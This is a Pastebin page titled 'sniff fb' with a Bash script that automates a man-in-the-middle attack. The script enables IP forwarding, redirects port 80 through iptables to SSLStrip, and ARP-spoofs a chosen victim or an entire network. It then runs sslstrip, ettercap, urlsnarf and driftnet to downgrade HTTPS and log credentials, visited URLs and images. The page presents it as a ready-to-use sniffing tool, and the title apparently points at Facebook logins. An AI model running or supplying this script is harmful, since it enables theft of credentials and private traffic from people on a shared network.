Advertisement
saifulfaizan

sniff fb

Dec 6th, 2011
126
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 1.69 KB | None | 0 0
  1. #!/bin/bash
  2.  
  3. # Script for sniffing https connections.
  4. # Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
  5. # Tested on BT4 R2
  6. # BY gHero,cseven,spudgunman.
  7. # Ver 0.2
  8.  
  9. # ASCII sniff.sh
  10. echo '
  11. .__ _____ _____ .__
  12. ______ ____ |__|/ ____\/ ____\ _____| |__
  13. / ___// \| \ __\\ __\ / ___/ | \
  14. \___ \| | \ || | | | \___ \| Y \
  15. /____ >___| /__||__| |__| /\/____ >___| /
  16. \/ \/ \/ \/ \/
  17. '
  18.  
  19. echo '1' > /proc/sys/net/ipv4/ip_forward
  20.  
  21. iptables --flush
  22. sleep 1
  23.  
  24. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
  25.  
  26.  
  27. # Arpspoof
  28. echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
  29. read ARPOP
  30.  
  31. if [ "$ARPOP" == "T" ] ; then
  32. echo
  33. echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
  34. echo '------------------------'
  35. echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
  36. read IP1
  37. echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
  38. read IP2
  39.  
  40. echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
  41. read INT
  42. xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &
  43.  
  44. else
  45.  
  46. echo
  47. echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
  48. echo '------------------------'
  49. echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
  50. read IP2
  51.  
  52. echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
  53. read INT
  54. xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' &
  55.  
  56. fi
  57.  
  58. # SSLSTRIP
  59. xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &
  60.  
  61. # ETTERCAP
  62. xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' &
  63.  
  64. # URLSNARF
  65. xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt' &
  66.  
  67. # DRIFTNET
  68. driftnet -p -i $INT &
  69.  
  70.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement